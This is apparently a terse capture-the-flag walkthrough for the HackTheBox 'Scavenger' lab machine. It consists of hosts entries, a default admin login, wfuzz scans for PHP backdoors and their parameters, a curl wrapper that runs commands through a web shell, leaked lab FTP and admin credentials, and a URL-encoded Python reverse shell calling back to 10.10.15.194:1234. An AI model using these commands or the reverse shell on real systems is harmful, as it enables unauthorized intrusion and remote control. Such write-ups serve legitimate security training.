HackTheBox – Scavenger

Add this in /etc/hosts : www.supersechosting.htb,www.justanotherblog.htb,www.pwnhats.htb,www.rentahacker.htb

Add this entry : sec03.rentahacker.htb on /etc/hosts

At the login page we see the message: Warning: You should disable the default 'administrator' account or change its password. This tells us that the default credentials may not have been changed!

Trying the default login administrator:root we get access:

root@kali:~/Downloads# wfuzz -w /usr/share/seclists/Discovery/Web-Content/CommonBackdoors-PHP.fuzz.txt -t 20 –hc 404 http://sec03.rentahacker.htb/FUZZ

root@kali:~/Downloads# wfuzz -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt -t 20 –hh 0 http://sec03.rentahacker.htb/shell.php?FUZZ=id

CODE :

#!/bin/bash

HOST=sec03.rentahacker.htb

CMD=$(urlencode $@)

curl -s \

     “http://$HOST/shell.php?hidden=$CMD”

CODE:

#!/bin/bash

HOST=sec03.rentahacker.htb

CMD=$(urlencode $@)

curl -s \

http://$HOST/shell.php?hidden=$CMD

root@kali:~/Downloads# sudo apt-get install gridsite-clients

FTP:

Username: ib01ftp

Password: YhgRt56_Ta

Email: pwnhats@pwnhats.htb

Password: GetYouAH4t!

This password same working for “ib01c01”

http://www.pwnhats.htb/admin530o6uisg/index.php?controller=AdminLogin&token=de267fd50b09d00b04cca76ff620b201

now try

FTP cred: which we get earlier

ib01c01:GetYouAH4t!

http://sec03.rentahacker.htb/shell.php?hidden=echo%20%27g3tPr1v%27%3E/dev/ttyR0;python%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.bind((%220.0.0.0%22,20));s.connect((%2210.10.15.194%22,1234));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/sh%22,%22-i%22]);%27

@SAKSHAM DIXIT